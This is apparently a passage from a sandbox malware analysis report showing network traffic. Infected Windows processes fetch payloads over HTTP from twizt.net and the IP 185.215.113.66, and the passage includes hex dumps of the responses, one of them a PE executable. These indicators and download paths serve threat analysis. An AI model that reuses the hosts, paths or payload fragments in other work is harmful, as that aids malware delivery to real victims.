Dec 5, 2024 17:31:45.069633961 CET	1236	IN	Data Raw: 89 55 f0 8b 45 e0 03 45 14 89 45 e0 c7 45 e4 00 00 00 00 8b 4d f0 89 4d ec 8b 55 e0 89 55 d4 8b 45 d4 33 d2 f7 75 f4 89 45 f0 8b 45 f0 0f af 45 f4 8b 4d d4 2b c8 89 4d e8 8b 55 e8 c1 e2 10 0b 55 d0 89 55 d4 81 7d f0 00 00 01 00 74 0c 8b 45 f0 0f Data Ascii: UEEEEMMUUE3uEEEM+MUUU}tEE;Ev<MMUUUEEE}sMM;MvUUE%EMMMUREPMQUR;E%tMMUUUE
Dec 5, 2024 17:31:45.183346987 CET	1236	IN	Data Raw: 4d 18 8b 11 52 8b 45 10 50 8b 4d 08 51 e8 10 0b 00 00 83 c4 10 8b 55 0c 89 02 33 c0 e9 1a 03 00 00 83 7d cc 00 7d 1b 8b 45 14 50 8b 4d 10 51 8b 55 0c 52 e8 ca 07 00 00 83 c4 0c 33 c0 e9 f9 02 00 00 83 7d cc 00 75 59 8b 45 fc 50 8b 4d 18 51 8b 55 Data Ascii: MREPMQU3}}EPMQUR3}uYEPMQURE}}EPMQUR3}uEPjMQ3EEUU} sEMT#UtEEMQUREPMQ
Dec 5, 2024 17:31:47.909708023 CET	176	OUT	GET /peinstall.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 Host: twizt.net
Dec 5, 2024 17:31:52.642520905 CET	184	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:31:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.11	49747	185.215.113.66	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:31:54.827510118 CET	166	OUT	GET /1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Dec 5, 2024 17:31:56.247548103 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:31:55 GMT Content-Type: application/octet-stream Content-Length: 9472 Last-Modified: Tue, 03 Dec 2024 13:03:44 GMT Connection: keep-alive ETag: "674f01b0-2500" Accept-Ranges: bytes Data Raw: a8 ae a9 45 71 6e c0 b6 37 92 82 98 6e c2 a5 8e 2a 25 0f 76 20 75 26 50 55 1b ea 98 8e dc 4b 3a 96 50 b2 58 9e 09 77 fc 6a 3e b2 ab 3f 68 e1 72 12 22 42 c3 f5 05 48 2b 3c f4 a3 5f 81 f1 69 40 de 88 46 74 8c a1 91 28 1e b3 2a b1 73 49 65 e4 30 ef 87 61 6c 0a 1b 2e 93 42 4d 1a 5f 8f db c0 ee 24 22 98 b5 6f 90 1b 36 1f 11 c7 a2 b9 2a e5 36 35 cf 09 16 aa fa 26 f0 e6 ac 23 26 a8 73 51 08 65 c5 6e 1a f7 9d 52 1b ba 02 48 1d c4 af c4 1a b4 1f ed be cd d6 16 b3 78 f7 81 a8 86 53 0d f6 07 4d b4 82 f1 f9 22 de 19 0a a4 97 3c b1 e5 7a c7 ec b5 bc e7 a9 6a 83 67 a1 1c 3e 3c 43 ec 39 84 b6 31 c7 5b 0b 3a 86 a9 ce 31 57 2f 03 ad cb 38 ec c0 01 c8 17 63 04 aa f1 90 8b d2 68 f6 1d 5b ba d7 10 6d a2 88 9a e8 eb 51 b1 13 00 f5 25 8e 1b 7f 62 70 b3 e9 bd bc 01 e8 18 3d be 3d 50 9b 98 a1 c2 24 ef f2 3f eb 2f cf 9f e3 e6 9b 35 85 3a 85 6a 04 c7 20 b2 30 bd e8 12 d0 cf 39 7b 0a 29 d4 84 52 4c 64 b5 a3 75 4e 80 ef 22 ae 05 61 3c 18 53 fd ad 22 1f 26 d1 00 46 9a bf a2 81 8d 9e 6f 98 71 49 b7 7d 53 7d 98 a8 4a fd bf da 86 [TRUNCATED] Data Ascii: Eqn7n%v u&PUK:PXwj>?hr"BH+<_i@Ft(sIe0al.BM_$"o665&#&sQenRHxSM"<zjg><C91[:1W/8ch[mQ%bp==P$?/5:j 09{)RLduN"a<S"&FoqI}S}J&fRt:Dx_B)OUDdx7Da}Zk)%j_7?Wg.l`<#Z#bp1PTbkGx7[5.!RFmw52)ZTNy8A(`_^Z`"7w\=Bz-s'Dxe%sI,_8<1Bp)a0Q_I^fBoaF>O0X5(e/kaa.39[rJ&3V:9_k"ft{wTsVHcNER.tKB:c4+}U2M.! hm%C>={g_{NBaA~}_Rzyjm9Os+zQ[Z`Yi@RjaAaBmA@zY!+oUHWO$1fsK:0:*,a\n>\P(Lr@xSie;b\|HyW9>Sgx%2S\4`zG
Dec 5, 2024 17:31:56.247575998 CET	1236	IN	Data Raw: 24 13 d6 38 8f fc 29 77 22 b4 15 19 b0 a1 cb b7 e0 4b 1c 76 57 dd 1d f0 60 d9 f7 52 69 5b 23 e7 38 30 47 63 bb ed 1b f7 15 f5 97 29 91 dd ce 82 b8 e8 94 a9 05 9b 8f 35 1e 45 c7 e8 20 ef d0 db 16 80 fe b4 ac eb 35 12 74 77 72 24 37 62 b3 27 5c 81 Data Ascii: $8)w"KvW`Ri[#80Gc)5E 5twr$7b'\{Zuw\|1r $K/.v$$3xj7GI8wA>$6NFjh2m[=k08a}H E"5G[
Dec 5, 2024 17:31:56.247587919 CET	1236	IN	Data Raw: 89 11 90 f0 30 5d 06 79 7d 11 91 53 a2 46 2a 99 af 89 be 89 c8 83 47 2f 5e ef 6a 87 f1 7c 3a df a2 02 bb a3 df d2 1f 3a 08 9d e6 63 5d dd e3 c8 b4 1a ad 2a 53 c5 97 64 d5 9b b7 66 cc 4b 9e c7 1a 33 07 e8 ac 25 da a7 84 91 1d 25 bd de 9a e6 f7 1a Data Ascii: 0]y}SFG/^j\|::c]SdfK3%%4vriY^~4w/'`3Wx0b/".4AM0IjS#O'1V##+.jttssp4F9a0{W{+mF9_X#9`<`811
Dec 5, 2024 17:31:56.247601032 CET	1236	IN	Data Raw: 1d be e3 38 fe 87 7e b5 6d 58 aa 5c 13 e6 a5 b7 77 a5 c8 43 39 e2 87 3a 9a d6 88 bd c1 a8 f5 24 83 23 a6 89 0d de 27 33 d7 55 67 b0 a9 0e 84 95 1d 85 2c 1d e0 b5 27 93 cb 6e db b1 78 8b c2 05 c1 16 93 b6 0f 53 d9 20 e5 88 aa c2 25 c4 f3 16 d3 1d Data Ascii: 8~mX\wC9:$#'3Ug,'nxS %kU0]P>/DO\)#B+w~GkumhhFFjx6>`bz+Gb_k:EeWSIF+n8l-"kz.To()>H<#DIj$W:J/eU\ep
Dec 5, 2024 17:31:56.247687101 CET	1236	IN	Data Raw: 2f d2 b0 3f e0 39 9a 07 57 31 bc fd 0e 71 99 76 58 86 49 b0 90 52 15 84 2c 37 30 4e 73 a1 ca 93 3d 29 c7 b9 aa 3f 97 61 0f a3 a5 e1 dc 06 ec 8d 7f 52 6d 54 b5 79 ff eb 4b 04 ec 05 bd cd 2c 34 02 21 8b 77 e6 70 c0 d6 2f be 36 de 14 26 aa db 2a b7 Data Ascii: /?9W1qvXIR,70Ns=)?aRmTyK,4!wp/6&*_C2kYO~6~hcah\(W"hY$4C$fjz0nqh:~rfrN1Vx1qn>5T M .A'=+<
Dec 5, 2024 17:31:56.247700930 CET	1236	IN	Data Raw: f5 33 7e 51 d0 1d 0a cc 3f c9 2e 84 8f 1f 47 7d e2 6d e2 1a 0f f8 27 13 14 59 b3 46 45 33 ef f4 67 df eb e0 59 ff 29 b1 ea 12 c8 d9 b4 d1 af e6 9a fb a4 ba 80 a7 30 c6 d1 c0 f6 10 d3 09 45 64 60 be e2 7c cb 6d ea 76 2f 1b 4e e8 b1 98 dc 7f 2e b1 Data Ascii: 3~Q?.G}m'YFE3gY)0Ed`\|mv/N.bT3>r_qaE~=1u,Ok['HJyp[+"22?!s8:8Lb\|BQEdqN96>7:WtKtrXl2CDFcu~ZZqrD-#l}E&Q
Dec 5, 2024 17:31:56.247714043 CET	744	IN	Data Raw: 37 36 14 ef 30 ee f8 f2 f4 b1 32 98 51 9c 01 31 ae e5 14 0d d7 4f dc 08 c1 ff d0 f6 0c b9 ba 36 ce 8c 81 ed ae 51 2e 2d dd 11 21 52 a2 c6 ae 9a 19 04 42 88 fd f9 34 22 97 f2 66 93 e9 57 03 52 d5 56 9d b9 33 43 49 36 e9 35 df e2 f0 f5 c6 9b b5 78 Data Ascii: 7602Q1O6Q.-!RB4"fWRV3CI65x`3$Tg^:F=nlX,#~4?^./1OV&}S5x8>mw{iQr8!XUfG.p2"3PoG%X@3\|_M\|7
Dec 5, 2024 17:31:56.247742891 CET	1236	IN	Data Raw: e9 fd a6 b8 fd f0 da a6 27 f3 9a e7 ca 4c 95 ac 40 22 a6 fd 28 3f 72 f6 ba 54 b7 cb ce 62 32 48 61 99 31 c2 26 77 3c 9e b9 8f ec d8 a9 2b 6e 6c c1 ef 6d 34 e7 d2 5c a8 68 3e 85 36 3f 6c cb 14 8b e4 50 7e 9f 27 e2 c3 82 8b 33 4f 7c 44 d7 48 48 6f Data Ascii: 'L@"(?rTb2Ha1&w<+nlm4\h>6?lP~'3O\|DHHojCa->'XcEgPfd~\ci].ss^*oHGby%<w/oF`l(WWNa0G%::PTBjbPK;]R`SeA!^
Dec 5, 2024 17:31:56.247756004 CET	340	IN	Data Raw: 1f ce 61 f2 44 97 0d 53 57 18 6c 29 ae 6d 9a af 47 ad 11 15 5b 65 e8 99 76 8d 49 78 42 5a d7 03 03 db 51 0c 57 57 fe eb 8b 30 b8 70 d8 76 da b7 a1 e0 75 66 9a 7e 51 b6 be ff 5b 55 5a d5 6b fc 99 22 01 aa ef db 3b d2 d9 a7 67 36 e3 ed 93 8b c4 e5 Data Ascii: aDSWl)mG[evIxBZQWW0pvuf~Q[UZk";g6wjI'i[+`0.q:I$Dy_}~G):oR`Og";h~K^oxXTir&D\?uTGmK>*clj_)<1zk:!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.11	49756	185.215.113.66	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:31:57.788091898 CET	166	OUT	GET /1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Dec 5, 2024 17:31:59.111695051 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:31:58 GMT Content-Type: application/octet-stream Content-Length: 9472 Last-Modified: Tue, 03 Dec 2024 13:03:44 GMT Connection: keep-alive ETag: "674f01b0-2500" Accept-Ranges: bytes Data Raw: a8 ae a9 45 71 6e c0 b6 37 92 82 98 6e c2 a5 8e 2a 25 0f 76 20 75 26 50 55 1b ea 98 8e dc 4b 3a 96 50 b2 58 9e 09 77 fc 6a 3e b2 ab 3f 68 e1 72 12 22 42 c3 f5 05 48 2b 3c f4 a3 5f 81 f1 69 40 de 88 46 74 8c a1 91 28 1e b3 2a b1 73 49 65 e4 30 ef 87 61 6c 0a 1b 2e 93 42 4d 1a 5f 8f db c0 ee 24 22 98 b5 6f 90 1b 36 1f 11 c7 a2 b9 2a e5 36 35 cf 09 16 aa fa 26 f0 e6 ac 23 26 a8 73 51 08 65 c5 6e 1a f7 9d 52 1b ba 02 48 1d c4 af c4 1a b4 1f ed be cd d6 16 b3 78 f7 81 a8 86 53 0d f6 07 4d b4 82 f1 f9 22 de 19 0a a4 97 3c b1 e5 7a c7 ec b5 bc e7 a9 6a 83 67 a1 1c 3e 3c 43 ec 39 84 b6 31 c7 5b 0b 3a 86 a9 ce 31 57 2f 03 ad cb 38 ec c0 01 c8 17 63 04 aa f1 90 8b d2 68 f6 1d 5b ba d7 10 6d a2 88 9a e8 eb 51 b1 13 00 f5 25 8e 1b 7f 62 70 b3 e9 bd bc 01 e8 18 3d be 3d 50 9b 98 a1 c2 24 ef f2 3f eb 2f cf 9f e3 e6 9b 35 85 3a 85 6a 04 c7 20 b2 30 bd e8 12 d0 cf 39 7b 0a 29 d4 84 52 4c 64 b5 a3 75 4e 80 ef 22 ae 05 61 3c 18 53 fd ad 22 1f 26 d1 00 46 9a bf a2 81 8d 9e 6f 98 71 49 b7 7d 53 7d 98 a8 4a fd bf da 86 [TRUNCATED] Data Ascii: Eqn7n%v u&PUK:PXwj>?hr"BH+<_i@Ft(sIe0al.BM_$"o665&#&sQenRHxSM"<zjg><C91[:1W/8ch[mQ%bp==P$?/5:j 09{)RLduN"a<S"&FoqI}S}J&fRt:Dx_B)OUDdx7Da}Zk)%j_7?Wg.l`<#Z#bp1PTbkGx7[5.!RFmw52)ZTNy8A(`_^Z`"7w\=Bz-s'Dxe%sI,_8<1Bp)a0Q_I^fBoaF>O0X5(e/kaa.39[rJ&3V:9_k"ft{wTsVHcNER.tKB:c4+}U2M.! hm%C>={g_{NBaA~}_Rzyjm9Os+zQ[Z`Yi@RjaAaBmA@zY!+oUHWO$1fsK:0:*,a\n>\P(Lr@xSie;b\|HyW9>Sgx%2S\4`zG
Dec 5, 2024 17:31:59.111733913 CET	124	IN	Data Raw: 24 13 d6 38 8f fc 29 77 22 b4 15 19 b0 a1 cb b7 e0 4b 1c 76 57 dd 1d f0 60 d9 f7 52 69 5b 23 e7 38 30 47 63 bb ed 1b f7 15 f5 97 29 91 dd ce 82 b8 e8 94 a9 05 9b 8f 35 1e 45 c7 e8 20 ef d0 db 16 80 fe b4 ac eb 35 12 74 77 72 24 37 62 b3 27 5c 81 Data Ascii: $8)w"KvW`Ri[#80Gc)5E 5twr$7b'\{Zuw\|1r
Dec 5, 2024 17:31:59.114202976 CET	1236	IN	Data Raw: a4 24 91 bc b1 db 4b dd 2f 2e 0a 15 f6 c5 76 91 95 d9 c2 24 e8 c1 a1 24 33 78 ce da c4 6a 9a 37 c2 47 a9 49 1f 18 c0 90 38 77 03 41 3e 24 f9 f8 aa 36 d3 9d 0d ff c2 f1 93 8a c7 96 ae 86 a0 4e f2 46 6a f5 68 32 6d e0 f3 5b f3 ba db cb 0e cc 3d 0b Data Ascii: $K/.v$$3xj7GI8wA>$6NFjh2m[=k08a}H E"5G[A9\'xZLU'0O]f.SHzv_JnUC6C-!-H;DF6($enNQ>
Dec 5, 2024 17:31:59.114213943 CET	224	IN	Data Raw: 60 33 e4 57 f1 78 d1 30 0a 9b 62 2f 1d 1c 08 c3 a5 22 2e d1 34 87 16 2a 41 c9 4d ee 9b 30 49 1e e8 6a 53 83 23 cc 9c 17 d8 4f f9 27 31 01 56 11 23 a0 23 2b 2e 6a 74 1f 74 73 cb 11 cb c1 2a 0d ec 1a 0e ee 73 8d 1b 70 ac 87 f3 fc 34 46 db 9b d7 c1 Data Ascii: `3Wx0b/".4AM0IjS#O'1V##+.jttssp4F9a0{W{+mF9_X#9`<`811MEECM_bOj2jvv;))z46WF7zcMOYmHJc)6m&%Z'\|
Dec 5, 2024 17:31:59.114226103 CET	1236	IN	Data Raw: eb 3a 00 2e b2 93 6f 38 35 f1 e1 15 0d ff ac 3e fb 24 ba 3d 2d e8 4c b1 c7 e2 e6 12 f5 1f 00 d3 bf d1 0f d9 e7 08 62 79 cc d3 fe fe 70 d6 66 29 ea 03 0f e0 75 eb e2 3e 6e 95 73 01 1e 73 c6 a3 3c b5 1b 8e 8d 13 79 3a f1 ba 65 1f c9 03 00 9e cf c2 Data Ascii: :.o85>$=-Lbypf)u>nss<y:e0lE#!)D\|.GkNjzuU~sS'2GIAF7Ulz{^r?^<6.2FT,wC+{pN}WouT{Fm,Z!
Dec 5, 2024 17:31:59.114238977 CET	24	IN	Data Raw: b2 70 c8 24 55 25 2d 49 a6 e5 1a ae 8d dc b6 a6 3c 0c c0 78 c5 16 13 5b Data Ascii: p$U%-I<x[
Dec 5, 2024 17:31:59.116379976 CET	1236	IN	Data Raw: 01 5e 1e 42 70 f5 61 73 f1 0c 3e fb ed 02 70 e3 f2 8d 7f 63 08 8e 11 34 36 48 68 74 e5 6c fd 21 7b e7 09 bc e5 e6 a4 c2 a6 e9 8a f5 1b 49 0f dc cc 82 ee 89 3a db 91 dc 48 5d c4 98 b8 0a ed b8 9b 4c 28 09 ce cd 2b 86 8b 9d 2d 80 57 c4 60 4b 06 a6 Data Ascii: ^Bpas>pc46Hhtl!{I:H]L(+-W`KkE_P@%))"=$%<b80{`\3@<U/t-%"[-7(*q.S.e\|a_iB>9m2Q\|cjC,uMQ&ez; >}V`?`0
Dec 5, 2024 17:31:59.116414070 CET	1236	IN	Data Raw: 15 9d fe f4 07 05 d4 1f f0 a0 6c d7 0d 39 91 a5 49 3c 8c eb 10 ca 4d 06 b0 60 1b 8d 58 c7 ab 92 c7 6b 55 73 52 ea 55 db d8 37 96 94 06 5a f4 de d8 41 92 1d 88 57 80 f0 71 ad ce 92 66 d8 88 f2 98 f1 66 20 d4 ab ff c3 3c af a6 a0 83 3e b2 ed b3 a0 Data Ascii: l9I<M`XkUsRU7ZAWqff <>j+Sh.Psl)cbF{q<Cj?=~,6,$yZ_74QuGS_C\|Pn-b'npNv:A+[97]Lg!7[,m["*?{\|(\|v
Dec 5, 2024 17:31:59.116424084 CET	248	IN	Data Raw: 08 27 45 cd 18 52 40 e6 c0 c5 d7 9c b3 55 03 87 49 31 c8 3e f3 3c a4 ce 21 1d b9 07 76 a5 4d fa 01 d5 59 74 0e 97 25 b1 17 6a ae 4d 8d a3 26 b7 54 27 30 df 79 e7 77 51 ef 0e e9 db db 06 62 c7 b9 15 b1 b4 6a 0c a6 e2 c5 1e 41 70 6d 8c 37 64 c6 eb Data Ascii: 'ER@UI1><!vMYt%jM&T'0ywQbjApm7d`YA8dFIy{7{,wdFQg7TRorwfw`[q/LC]CmBqbWvI}DNAW[f*cSqZ_hMt1JA:
Dec 5, 2024 17:31:59.119033098 CET	1236	IN	Data Raw: c3 40 7a 9b 27 88 a7 3d f3 4f 76 4f 9d 81 2a b8 bb 78 1e 60 55 87 2d 9c f4 43 a7 94 ea a1 c2 c9 2f b8 1a 96 e8 d8 3d 74 c2 4d 2c e7 ed 9f 87 5a 87 18 a2 55 92 88 6d 32 bc 9e ca 3d fc 86 bc 95 a6 19 f7 67 2c bc a2 27 0b 4e da 6e 9e 27 b8 1d 15 29 Data Ascii: @z'=OvO*x`U-C/=tM,ZUm2=g,'Nn')/C]jmO2qPy,v5yQiQl[x;l@>ULb@7pi.Rxju}Kw(\|JC79dh<>}+4mXHBhQ%
Dec 5, 2024 17:31:59.231987953 CET	1236	IN	Data Raw: 54 04 7d 2a c5 e8 7a 84 17 11 2f 10 d3 cc a0 28 56 de b0 1d 7f e5 62 6e 42 76 ba fa 46 3e c1 2e 67 c3 68 cb 43 43 dc 04 be e4 87 e3 86 cd bd 5c c0 ef 84 63 ee 86 09 76 95 ee 98 48 cd 8c 37 bd fc 9e 5b 38 2d 26 09 9e 8d 78 09 76 22 65 39 fd 91 cb Data Ascii: T}*z/(VbnBvF>.ghCC\cvH7[8-&xv"e9c2M7\|t5s<VUnMi.~_'L@"(?rTb2Ha1&w<+nlm4\h>6?lP~'3O\|DHHojCa->'XcEgPf
Dec 5, 2024 17:32:04.410579920 CET	166	OUT	GET /2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Dec 5, 2024 17:32:04.848979950 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:32:04 GMT Content-Type: application/octet-stream Content-Length: 10496 Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT Connection: keep-alive ETag: "67154d18-2900" Accept-Ranges: bytes Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED] Data Ascii: \|@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\\|wBvugOX% hr9:\|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c\|gL0)cM]oL{:En:?\|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.11	49775	185.215.113.66	80	8016	C:\Users\user\AppData\Local\Temp\1171111125.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:32:03.706990004 CET	166	OUT	GET /rh.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: twizt.net
Dec 5, 2024 17:32:05.059839010 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:32:04 GMT Content-Type: application/octet-stream Content-Length: 449536 Last-Modified: Mon, 02 Dec 2024 07:59:26 GMT Connection: keep-alive ETag: "674d68de-6dc00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cd d8 9a 7a 89 b9 f4 29 89 b9 f4 29 89 b9 f4 29 c2 c1 f7 28 82 b9 f4 29 c2 c1 f1 28 06 b9 f4 29 c2 c1 f0 28 9d b9 f4 29 9c c6 f1 28 af b9 f4 29 9c c6 f0 28 98 b9 f4 29 9c c6 f7 28 9d b9 f4 29 c2 c1 f5 28 8a b9 f4 29 89 b9 f5 29 da b9 f4 29 89 b9 f4 29 8b b9 f4 29 b3 39 f0 28 8a b9 f4 29 b3 39 0b 29 88 b9 f4 29 b3 39 f6 28 88 b9 f4 29 52 69 63 68 89 b9 f4 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 5f 7b 5f 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 25 00 7c 03 00 00 66 03 00 00 00 01 00 be c7 02 00 00 10 00 00 00 90 03 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$z)))()()()()()()()))))9()9))9()Rich)PEL_{_d%\|f@@y("@nm@.textC{\| `.textbss.rdata@@.data;2p@.rsrc@@.reloc"$@B
Dec 5, 2024 17:32:05.059953928 CET	124	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 31 c0 ba 04 00 00 00 c7 01 66 41 55 a8 01 d1 01 d0 c7 01 a7 b4 48 26 01 Data Ascii: U1fAUH&q6/
Dec 5, 2024 17:32:05.062495947 CET	1236	IN	Data Raw: d0 c7 01 a4 de 54 c0 01 d1 01 d0 c7 01 82 66 4c 03 01 d1 01 d0 c7 01 4c 06 0a 55 01 d1 01 d0 c7 01 21 dd 16 e8 01 d1 01 d0 c7 01 76 1f ff 93 01 d1 01 d0 c7 01 67 3b 76 73 01 d1 01 d0 c7 01 3f 6c 33 25 01 d1 01 d0 c7 01 2b 87 15 4d 01 d1 01 d0 c7 Data Ascii: TfLLU!vg;vs?l3%+M.4Ff[K$NA.>1_bEW1tQ-FfzzFD$#1
Dec 5, 2024 17:32:05.062510014 CET	1236	IN	Data Raw: e0 01 d1 01 d0 c7 01 11 9f 58 4e 01 d1 01 d0 c7 01 3a 28 e9 2a 01 d1 01 d0 c7 01 94 f7 df a4 01 d1 01 d0 c7 01 44 eb a8 78 01 d1 01 d0 c7 01 2a 43 bf d5 01 d1 01 d0 c7 01 db 2a 17 25 01 d1 01 d0 c7 01 42 e2 89 62 01 d1 01 d0 c7 01 1d 3c cd ee 01 Data Ascii: XN:(DxC%Bb<tEJ$<2~N%[!9a6a'D}Zr\C7$
Dec 5, 2024 17:32:05.062521935 CET	248	IN	Data Raw: 01 0c fd 34 90 01 d1 01 d0 c7 01 03 ad 91 e0 01 d1 01 d0 c7 01 ce 2e 0a c9 01 d1 01 d0 c7 01 e7 a2 07 f7 01 d1 01 d0 c7 01 26 4c e5 17 01 d1 01 d0 c7 01 af 3d fc cd 01 d1 01 d0 c7 01 3c 5d 88 ad 01 d1 01 d0 c7 01 d1 b5 d5 b5 01 d1 01 d0 c7 01 3f Data Ascii: 4.&L=<]?/G~BKWh$n>SpIXCMBMDDnB%7
Dec 5, 2024 17:32:05.064523935 CET	1236	IN	Data Raw: d0 c7 01 d8 d6 20 4b 01 d1 01 d0 c7 01 94 f5 68 01 01 d1 01 d0 c7 01 28 c8 b8 6c 01 d1 01 d0 c7 01 78 4c ef b7 01 d1 01 d0 c7 01 26 fd 2c f8 01 d1 01 d0 c7 01 4d 0e 56 5c 01 d1 01 d0 c7 01 9b 42 fe 19 01 d1 01 d0 c7 01 92 b6 fb b9 01 d1 01 d0 c7 Data Ascii: Kh(lxL&,MV\B%rD$G=EK%.VD=ZHTEIhlu+apRK'
Dec 5, 2024 17:32:05.064537048 CET	1236	IN	Data Raw: 00 01 d1 01 d0 c7 01 ce 4e a2 27 01 d1 01 d0 c7 01 01 5f 04 da 01 d1 01 d0 c7 01 2b a6 bc 30 01 d1 01 d0 c7 01 09 0a 28 1d 01 d1 01 d0 c7 01 d9 88 4d 52 01 d1 01 d0 c7 01 63 74 ee 4a 01 d1 01 d0 c7 01 6d d2 1d 9b 01 d1 01 d0 c7 01 e4 27 1a 83 01 Data Ascii: N'_+0(MRctJm's:1JG`@Svmkkiu_vJ;,}vi+W5g
Dec 5, 2024 17:32:05.064548969 CET	248	IN	Data Raw: 01 9a ea 76 ce 01 d1 01 d0 c7 01 3b 3b 5c 97 01 d1 01 d0 c7 01 7d b1 08 14 01 d1 01 d0 c7 01 99 29 1a ec 01 d1 01 d0 c7 01 c4 36 e4 11 01 d1 01 d0 c7 01 32 e9 d6 55 01 d1 01 d0 c7 01 36 ae 4a 99 01 d1 01 d0 c7 01 bc 90 cb 30 01 d1 01 d0 c7 01 e0 Data Ascii: v;;\})62U6J04MumNEJ3q'f?]6&QvGiuSE=
Dec 5, 2024 17:32:05.067538023 CET	1236	IN	Data Raw: d0 c7 01 96 93 a3 e3 01 d1 01 d0 c7 01 f5 5c c0 65 01 d1 01 d0 c7 01 19 2b 18 a0 01 d1 01 d0 c7 01 fa 02 4b cb 01 d1 01 d0 c7 01 5f 9f 00 e9 01 d1 01 d0 c7 01 2a b6 13 87 01 d1 01 d0 c7 01 0e 70 ee 45 01 d1 01 d0 c7 01 1f 48 cf 25 01 d1 01 d0 c7 Data Ascii: \e+K_pEH%:I9\45QXj{"bOA[MMpDG[\ ShMKT
